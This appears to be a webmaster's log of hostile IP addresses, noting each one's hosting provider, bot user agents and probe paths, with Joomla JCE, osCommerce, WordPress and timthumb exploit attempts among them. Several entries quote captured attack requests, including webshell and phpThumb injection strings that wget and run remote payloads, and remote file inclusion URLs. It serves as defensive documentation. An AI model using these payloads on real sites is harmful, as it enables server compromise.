Web server: 37 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/abc.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
94.242.252.91 Hostname: ip-static-94-242-252-91.as5577.net
Host: Luxembourg – Steinsel Root Sa
Hacker – Looking for wpOnlineStore / osCommerce / Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
User agent: IlTrovatore-Setaccio/1.2 (http: //www.iltrovatore.it/aiuto/faq.html)
87.238.192.84 Host: Germany – Hamburg Artfiles New Media Gmbh
Web server: 1428 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
212.53.128.131 Host: Germany – Hamburg Artfiles New Media Gmbh
Web server: 1033 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
72.249.175.220 Hostname: mvs005-002.directrouter.com
Host: United States – Saint Louis Rochen Limited
Web server: 28 websites
Hacker – Looking for wpOnlineStore / osCommerce / Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
User agent: Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)
69.89.31.249 Hostname: box449.bluehost.com
Host: United States – Temecula Unified Layer
Web server: 2066 websites
Scanning site for various admin exploits
113.53.152.210 Hostname: node-4wi.pool-113-53.dynamic.totbb.net
Host: Thailand – Bangkok Tot Public Company Limited
Dictionary attacker
wp-login.php
88.86.107.14 Hostname: unn-88-86-107-14.superhosting.cz
Host: Czech Republic – Prague Supernetwork S.r.o.
Web server: 27 websites
Hacker:
Looking for Joomla JCE Editor exploit
1) //images/stories/3xp.php
84.97.14.2 Hostname: 2.14.97.84.rev.sfr.net
Host: France – Boulogne-billancourt Societe Francaise Du Radiotelephone S.a.
Spambot:
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36 Squider/0.01
217.31.62.172 Hostname: www-wh02.lhc.ignum.cz
Host: Czech Republic – Prague Ignum S.r.o.
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/config.inc.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
79.174.72.84 Hostname: fe66.hc.ru
Host: Russian Federation – Moscow Hosting Center Ltd.
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/3xp.php
2) //images/stories/70pet.php
3) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
Hits site about 8 times daily with around 20 requests
193.110.75.118 Hostname: fe10M2.finfort.com
Host: Ukraine – Donets’k Ojsc Promtelecom
Web server: 23 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/bkht.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
78.175.168.174 Hostname: 78.175.168.174.dynamic.ttnet.com.tr
Host: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Brute force dictionary attack on wp-login.php with user name “admin”
190.240.118.2 Host: Colombia – Medellin Epm Telecomunicaciones S.a. E.s.p.
Web server: 1 website – previsora.gov.co
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
122.201.72.145 Hostname: huayra.turboservers.com.au
Host: Australia – Sydney Net Logistics Pty. Ltd.
Web server: 517 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/headlines/thumb.php?src= etc
66.197.141.156 Hostname: casino-estrategias.es
Host: United States – Scranton Network Operations Center Inc.
Trackback spammer
176.41.248.200 Host: Turkey – Karabaglar Tellcom Esentepe Adsl Pool Brute force dictionary attack on wp-login.php with user name “admin”
78.181.176.92 Hostname: 78.181.176.92.dynamic.ttnet.com.tr
Host: Turkey – Kozakli Turk Telekomunikasyon Anonim Sirketi
Brute force dictionary attack on wp-login.php with user name “admin”
213.5.177.220 Hostname: server.kal-digital.com
Host: United Kingdom – Kent Racksrv Communications Limited
Web server: 122 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
144.76.90.23 Hostname: j.bazqux.com
Host: Germany – Berlin Server Block
Scraper bot: BazQux/2.4
User agent: Mozilla/5.0 (compatible; BazQux/2.4; +https://bazqux.com/fetcher)
80.79.202.14 Host: Netherlands – Amsterdam Info.nl/hf B.v. Bot with malicious user agent Java/1.6.0_45
188.247.132.250 Hostname: public-250.gimelnet.rs
Host: Romania – Bucharest Prime Telecom Srl
Missing any user agent
71.8.216.13 Hostname: mail.parallelslincoln.com
Host: United States – Kearney Charter Communications
Web server: 2 websites – johnherdman.com , parallelslincoln.com
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/config.inc.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
109.190.93.162 Hostname: 162-93-190-109.dsl.ovh.fr
Host: France – Roubaix Ovh Systems
Web server: 1 website – compagniejuridique.com
Hacker: Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/explore.php
2) //images/stories/explore.php?cmd=cd%20/tmp%20;wget%20http: //sbta.org.br/cache/bugus.log%20;%20perl%20bugus.log%20;%20rm%20-rf%20bugus.log*
61.135.189.176 Host: China – Beijing China Unicom Beijing Province Network Chinese bot: Sogou web spider
UA: Sogou web spider/4.0(+http: //www.sogou.com/docs/help/webmasters.htm#07)
91.121.82.70 Hostname: ks352550.kimsufi.com
Host: France – Roubaix Ovh Systems
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/Specialist/thumb.php?src=http: //blogger.company.papelescreativos.com/wp-login.php
Malicious user agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Bad host: Roubaix Ovh
79.94.163.2 Hostname: 2.163.94.79.rev.sfr.net
Host: France – Paris Societe Francaise Du Radiotelephone S.a.
Spam or malicious bot (Squider)
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36 Squider/0.01
89.89.111.146 Hostname: brn29-1-89-89-111-146.dsl.sta.abo.bbox.fr
Host: France – Brest Bouygues Telecom S.a.
Spam or malicious bot (Squider)
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36 Squider/0.01
212.62.246.217 Host: Norway – Bergen Dataguard As
Web server: 8 websites
Hacker:
Known hacker bot user agent:
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/3xp.php
146.185.176.158 Host: Netherlands – Amsterdam Digital Ocean Inc. Spy bot: 200PleaseBot/1.0
UA: Mozilla/5.0 (compatible; 200PleaseBot/1.0; +http://www.200please.com/bot)
Bad host: Digital Ocean Inc (network of hosts running spy bots)
114.141.55.5 Hostname: chicknet.cyberplus.net.id
Host: Indonesia – Jakarta Pt Cyberplus Media Pratama
Brute force dictionary attacker: wp-login.php
62.75.169.39 Hostname: euve32956.vserver.de
Host: Germany – Berlin Intergenia Ag
Web server: 12 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/ViAr.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
62.109.30.222 Hostname: lala.ru
Host: Russian Federation – Irkutsk Ispsystem Cjsc
Web server: 2 websites – eaglesafes.ru , vse-dlya-doma-i-kuhni.ru
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/ViAr.php?clone
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
62.161.93.144 Host: France – Blagnac Orange S.a.
Web server: 2 websites – college-smdn.com , college-smdn.fr
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/food/footer.php?clone
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
54.211.233.188 Host: United States – Ashburn Amazon.com Inc. GrowerIdeas Crawler
Another bot hosted by Amazon AWS
88.150.177.98 Hostname: h88-150-177-98.host.redstation.co.uk
Host: United Kingdom – Gosport Redstation Limited
Web server: 39 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/tmp.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
72.249.183.228 Hostname: ivant.com
Host: United States – Arlington Rimuhosting
Web server: 2 websites – hpd1.com , zitan.com.ph
Looking for phpMyAdmin hack vulnerability
Examples:
207.55.247.216 Hostname: loudbaby.com
Host: United States – Columbus Jumpline Inc
Web server: 98 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) //images/stories/ViAr.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
130.75.16.204 Hostname: crawler.dcsec.uni-hannover.de
Host: Germany – Hannover Gottfried Wilhelm Leibniz Universitaet Hannover
Rule breaker – Rubbish bot
http: //crawler.dcsec.uni-hannover.de
146.185.170.99 Host: Netherlands – Amsterdam Digital Ocean Inc. “SEO” spy bot: updown_tester
Bad host: Digital Ocean Inc (network of hosts running spy bots)
65.55.215.77 Hostname: msnbot-65-55-215-77.search.msn.com
Host: United States – Quincy Microsoft Corporation
Rule breaker: reads robots.txt then immediately crawls disallowed paths and file types
User agent:
198.50.100.58 Host: Canada – Montreal Cameleon Media
Web server: 46 websites
Hacker:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
94.23.252.112 Hostname: ns383387.ovh.net
Host: France – Roubaix Ovh Systems
Web server: 4 websites
Hacker:
Known hacker bot user agents:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
183.78.169.60 Hostname: cp60.mfocus.com.my
Host: Malaysia – Kuala Lumpur Service Hosting
Web server: 52 websites
Hacker:
Known hacker bot user agents:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
217.8.253.97 Hostname: lvps217-8-253-97.vps.webfusion.co.uk
Host: United Kingdom – Derby Webfusion Internet Solutions
Web server: 5 websites
Hacker:
Known hacker bot user agents:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
208.109.184.10 Hostname: ip-208-109-184-10.ip.secureserver.net
Host: United States – New York City Godaddy.com Llc
Web server: 2 websites – cvi200.com , wratings.com
Hacker:
Known hacker bot user agents:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
81.169.137.166 Hostname: h2222757.stratoserver.net
Host: Germany Berlin Strato Ag
Web server: 29 websites
Hacker: Brute force DoS type attack
Known hacker bot user agents:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
81.93.240.124 Hostname: eternis.fr
Host: France – Saint-denis Servers Renting – Eweb
Web server: 5 websites
Hacker bot with user agent KcB @ 2013
Looking for exploit vulnerability in WordPress cufon fonts plugin
85.235.157.114 Hostname: clin15.cassiopea.it
Host: Italy – Ferrara Widestore S.r.l.
Web server: 364 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
107.20.70.26 Hostname: ec2-107-20-70-26.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Malicious bot: CCBot/2.0
Another bad bot from Amazon AWS
72.46.128.70 Hostname: 72-46-128.static.versaweb.net
Host: United States – Chicago Versaweb Llc
Web server: 11 websites
Rogue bot identified as “Mozilla Firefox”
Scanned site for images and stylesheets
176.28.55.108 Hostname: garlic.clove.net.au
Host: Australia – Waterloo Waterloo Access Networks
Web server: 3 websites
Hacker:
Known hacker bot user agents:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/config.inc.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
176.28.55.107 Hostname: server3.cubehost.de
Host: Germany – Koeln Host Europe Gmbh
Web server: 33 websites
Hacker:
Known hacker bot user agents:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/config.inc.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
208.115.111.75 Hostname: eqsg-promo.com
Host: United States – Miami Colopronto
EZOOMS “SEO” Spybot
UA: Mozilla/5.0 (compatible; Ezooms/1.0; help@moz.com)
69.60.119.117 Hostname: eqsg-promo.com
Host: United States – Miami Colopronto
Web server: 18 websites
Hacker – Looking for wpOnlineStore exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
175.126.82.54 Host: Korea, Republic Of – Seoul Hanaro Telecom
Web server: 1 website – jimddos.info
Dictionary brute force attacker
85.214.83.3 Hostname: h1948845.stratoserver.net
Host: Germany – Berlin Strato Ag
Web server: 5 websites
Hacker:
Known hacker bot user agents:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: 1) /images/stories/config.inc.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
85.27.38.46 Hostname: host-85-27-38-46.brutele.be
Host: Belgium – Charleroi Brutele Sc
Web server: 2 websites – maisonintelligente.eu , psychologue-tamines.be
Hacker:
Known hacker bot user agents: 1) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
2) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b
78.178.134.237 Hostname: 78.178.134.237.dynamic.ttnet.com.tr
Host: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
Example: /wp-content/plugins/post-gallery/thirdparty/phpthumb/phpThumb.php?src=
?file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20wget%20blowbeat.vulcano-music.com/s.txt;%20mv%20s.txt%20s.php%20;%20&phpThumbDebug=9%22;
77.222.40.233 Hostname: vh141.sweb.ru
Host: Russian Federation – Moscow Garant-park-telecom Ltd.
Web server: 482 websites
Hacker looking for VirtueMart RFI exploit
/components/com_virtuemart/themes/pbv_multi/scripts/timthumb.php?src=http: //picasa.com.hearthstones.info/InjectorThimThumb.php
172.246.127.26 Hostname: 26.127-246-172.rdns.scalabledns.com
Host: United States – Henderson Enzu Inc
Hacker looking for uploadify exploit:
/podhawk/uploadify/uploadify.css
Looking for Open Flash Library exploit
Bad host: Henderson Enzu
89.105.211.230 Hostname: hosting23.skyberate.net
Host: Netherlands – Doetinchem Avira B.v.
Web server: 23 websites
Hacker – Looking for wpOnlineStore exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
78.162.69.190 Host: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi Brute force dictionary attacker
wp-login.php with user name “admin” and multiple passwords
85.105.50.67 Hostname: 85.105.50.67.static.ttnet.com.tr
Host: Turkey – Izmir Turk Telekomunikasyon Anonim Sirketi
Web server: 3 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
81.169.137.166 Hostname: h2222757.stratoserver.net
Host: Germany – Berlin Strato Ag
Web server: 20 websites
Hacker:
Known hacker bot user agents:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
90.41.183.25 Hostname: AClermont-Ferrand-652-1-16-25.w90-41.abo.wanadoo.fr
Host: France – Clermont-ferrand Orange S.a.
Malicious bot (Squider)
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36 Squider/0.01
91.142.219.131 Hostname: icn1.microvisio.com
Host: Spain – Toledo Axarnet Comunicaciones Sl
Web server: 49 websites
Hacker – Looking for Joomla JCE Editor exploit
Example: /images/stories/bkht.php
103.14.202.139 Hostname: lynx.nerdster.com.au
Host: Australia – Brisbane Nerdster Pty. Ltd.
Hacker – Looking for Joomla JCE Editor exploit
Example: /images/stories/food.php
81.88.225.204 Hostname: www .rup.cr.it
Host: Italy – Cremona Aemcom Spa
Web server: 6 websites
Hacker – Looking for Joomla JCE Editor exploit
Example: /images/stories/wawalo.php
144.76.69.142 Host: Germany – Berlin Server Block
Hetzner Online AG
Bad bot – Sistrix crawler
Mozilla/5.0 (compatible; SISTRIX Crawler; http: //crawler.sistrix.net/)
82.144.221.113
Host: Ukraine – Kiev Kyivski Telekomunikatsiyni Merezhi Llc
Web server: 41 websites
Hacker:
Known hacker bot user agents: 1) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
2) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: //images/stories/borong.php
//images/stories/70pet.php
//images/stories/3xp.php
And others
95.211.82.239 Hostname: hosted-by.leaseweb.com
Host: Netherlands – Amsterdam Leaseweb B.v.
Web server: 38 websites
Hacker – Looking for wpOnlineStore vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
85.214.37.179 Host: Germany – Berlin Strato Ag
Web server: 20 websites
Hacker – Looking for wpOnlineStore vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
86.122.113.10 Hostname: 86-122-113-10.rdsnet.ro
Host: Romania – Simeria Rcs & Rds Business
Hacker:
Known hacker bot user agents: 1) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
2) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
85.214.91.150 Host: Germany – Berlin Strato Ag
Web server: 6 websites
Hacker:
Known hacker bot user agents: 1) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
2) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: //images/stories/ViAr.php?rf
//images/stories/food/footer.php?clone
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
216.243.174.66 Hostname: hobbes-66.hutman.net
Host: United States – Minneapolis Hutman Inc.
Web server: 39 websites
Hacker:
Known hacker bot user agents: 1) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
2) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: //modules/mod_poll/tmpl/footer.php?clone
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
//images/stories/media.php?rf
58.59.233.145 Host: China – Nanning Chinanet Guangxi Province Network Hacker:
Looking for Joomla JCE Editor exploit
Examples: /editor/editor/filemanager/upload/test.html
/FCKeditor/editor/filemanager/connectors/uploadtest.html
198.50.219.180 Hostname: hosting.esnoei.net
Host: Canada – Montreal Ovh Hosting Inc.
Web server: 27 websites
Hacker:
Known hacker bot user agents: 1) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
2) BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: //images/stories/ViAr.php?rf
//images/stories/food/footer.php?clone
188.138.106.76 Hostname: mail.datentechnikschwarz.de
Host: Germany – Hurth Intergenia Ag
Web server: 17 websites
Hacker:
Known hacker bot user agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Looking for Joomla JCE Editor exploit
Example: /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b
89.42.219.33 Host: Romania – Bucharest Romarg Srl
Web server: 80 websites
Hacker – Malicious bot:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Example:
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
216.238.64.106 Host: United States – Philadelphia Alxtech
Web server: 2 websites – alxnetworks.net , tf2blast.com
Trying to hotlink to CSS files
74.221.217.173 Host: United States – Seattle Dme Hosting Llc Spammer trying to post using known script exploit:
/suggerer_site.php?action=meta_get&id_cat
192.99.11.13 Hostname: ks4006354.ip-192-99-11.net
Host: Canada – Montreal Ovh Hosting Inc.
Hacker looking for ColdFusion exploit
Example: /CFIDE/administrator/enter.cfm
Bad host:
74.54.21.178 Hostname: hosting.devproducts.com
Host: United States – Dallas Theplanet.com Internet Services Inc.
Web server: 31 websites
Hacker – Malicious bot:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Some examples: /images/stories/0d4y.php
/&sa=U&ei=tn2hUqu1Caiv2QWZuIHoCg&ved=0CJsBEBYwFw&usg=AFQjCNGMZ2FDXwDEybQwYoYvswqmSG4zIQ//index.php?cid=20&file=imgmanager&option=com_jce&plugin=imgmanager&task=plugin&version=1576
196.35.74.231 Hostname: jhb-sabcnmtweb.sabc.co.za
Host: South Africa – Pretoria Internet Solutions
Web server: 1 website – sabc1.co.za
Hacker – Malicious bot: (probably hacked website or server)
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Some examples: /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
/images/stories/config.inc.php?rf
78.110.50.104 Hostname: c2-w.ht-systems.ru
Host: Russian Federation – Pavlovskaya Hosting Telesystems Jsc
Web server: 568 websites
Hacker – Looking for admin exploit
Example: //admin/administrators.php/login.php
54.209.131.122 Hostname: ec2-54-196-64-84.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Spy bot / web scraper from Amazon AWS
GermCrawler
54.196.64.84 Hostname: ec2-54-196-64-84.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Spy bot / web scraper from Amazon AWS
CCBot/2.0
85.128.142.66 Hostname: akl66.rev.netart.pl
Host: Poland – Warsaw Netart Spolka Akcyjna Spolka Komandytowo-akcyjna
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
59.106.141.147 Hostname: vts18.digitalink.ne.jp
Host: Japan – Osaka-shi Startia Co. Ltd
Web server: 43 websites
Hacker – Malicious bot:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Some examples: /images/stories/bottom.php?smtp
/images/stories/xperl.php
/images/stories/metri.php
/images/stories/fack.php
54.196.69.105 Hostname: ec2-67-202-18-97.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Spy bot / web scraper from Amazon AWS
CCBot/2.0
67.202.18.97 Hostname: ec2-67-202-18-97.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Spy bot / web scraper from Amazon AWS
CCBot/2.0
54.205.90.81 Hostname: ec2-54-205-90-81.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Another spy bot / web scraper from Amazon AWS
CCBot/2.0
1.221.77.126 Host: Korea, Republic Of – Seoul Boranet
Web server: 10 websites
Hacker – Malicious bot:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE Editor exploit
Examples: /images/stories/0day.php
/images/stories/70bex.php
/images/stories/iam.php
/images/stories/0d4y.php
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
173.254.28.14 Hostname: just14.justhost.com
Host: United States – Provo Unified Layer
Web server: 3633 websites
DoS attack on wp-login.php
144.76.217.17 Hostname: static.17.217.76.144.clients.your-server.de
Host: Germany – Nuremberg Server Block
Web server: 1 website – comart.gr
Hacker – Malicious bot:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE editor exploit
Examples: /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
//images/stories/helper.php?rf
202.210.151.73 Hostname: www .uiui.net
Host: Japan – Tokyo Bekkoame/internet
Web server: 1 website – uiui.net
Hacker – Looking for Joomla JCE Editor exploit
Examples: /images/stories/pussy.php?rf
174.142.46.58 Hostname: enuf.coolstuff.co.za
Host: Canada – Montreal Iweb Dedicated Cl
Web server: 94 websites
Hacker looking for SQL exploit
/admin/sqlpatch.php/password_forgotten.php
URL/&;sa=U&;ei=KPmdUuOMGPOg7AbonoHYDg&;ved=0CLoCEBYwLjhk&;usg=AFQjCNFdGQjRXP9D2Ku2EetrM6l-7zsp6A/admin/sqlpatch.php/password_forgotten.php?action=execute
121.78.129.173 Host: Korea, Republic Of – Seoul Kinx
Web server: 33 websites
Hacker – Looking for Joomla JCE Editor exploit
